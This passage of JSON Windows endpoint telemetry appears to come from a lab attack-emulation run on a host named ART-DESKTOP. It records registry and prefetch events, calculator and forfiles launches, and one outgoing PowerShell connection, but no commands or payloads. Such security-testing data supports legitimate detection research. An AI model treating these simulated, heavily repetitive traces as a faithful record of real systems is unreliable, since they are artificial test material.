"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026480000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026480000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "file", - "file_name": "CALC.EXE-AC08706A.pf", - "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027320000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FORFILES.EXE-BE58C675.pf", - "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027350000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FORFILES.EXE-BE58C675.pf", - "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574027350000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574035550000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574035550000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50511", - "subtype": "outgoing", - "timestamp": 131883574030630000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PositionObject", - "registry_value": "PositionObject", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\Version", - "registry_value": "Version", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574055110000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", - "timestamp": 131883574055580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574055580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574055740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883574056050000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574056050000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "file", - "file_name": "AUDIODG.EXE-D0D776AC.pf", - "file_path": "C:\\Windows\\Prefetch\\AUDIODG.EXE-D0D776AC.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574076520000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574081680000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574081680000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574085740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574085740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883574149810016, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574190430000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574191360000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574191520000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883574191990000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574191990000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": 